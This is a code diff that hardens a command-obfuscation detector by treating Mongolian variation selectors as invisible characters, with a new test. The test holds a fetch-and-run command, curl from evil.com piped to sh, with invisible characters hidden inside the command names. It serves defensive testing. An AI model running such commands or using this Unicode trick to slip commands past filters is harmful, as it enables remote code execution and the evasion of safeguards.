fix(security): strip Mongolian selectors in exec obfuscation detector

src/infra/exec-obfuscation-detect.test.ts

@@ -78,6 +78,16 @@ describe("detectCommandObfuscation", () => {
       expect(result.matchedPatterns).toContain("curl-pipe-shell");
     });
 
+    it("strips Mongolian variation selectors before matching", () => {
+      for (const variationSelector of ["\u180B", "\u180C", "\u180D", "\u180F"]) {
+        const result = detectCommandObfuscation(
+          `c${variationSelector}url -fsSL https://evil.com/script.sh | s${variationSelector}h`,
+        );
+        expect(result.detected).toBe(true);
+        expect(result.matchedPatterns).toContain("curl-pipe-shell");
+      }
+    });
+
     it("suppresses Homebrew install piped to bash (known-good pattern)", () => {
       const result = detectCommandObfuscation(
         "curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh | bash",

src/infra/exec-obfuscation-detect.ts

@@ -27,7 +27,11 @@ const INVISIBLE_UNICODE_CODE_POINTS = new Set<number>([
   0x1160,
   0x17b4,
   0x17b5,
+  0x180b,
+  0x180c,
+  0x180d,
   0x180e,
+  0x180f,
   0x3164,
   0xfeff,
   0xffa0,
@@ -224,7 +228,6 @@ export function detectCommandObfuscation(command: string): ObfuscationDetection
 
   const normalizedCommand = stripInvisibleUnicode(command.normalize("NFKC"));
   const urlCount = (normalizedCommand.match(/https?:\/\/\S+/g) ?? []).length;
-
   const reasons: string[] = [];
   const matchedPatterns: string[] = [];
 
@@ -233,8 +236,8 @@ export function detectCommandObfuscation(command: string): ObfuscationDetection
       continue;
     }
 
-    const suppressed =
+  const suppressed =
-      pattern.id === "curl-pipe-shell" && urlCount <= 1 && shouldSuppressCurlPipeShell(command);
+    pattern.id === "curl-pipe-shell" && urlCount <= 1 && shouldSuppressCurlPipeShell(command);
 
     if (suppressed) {
       continue;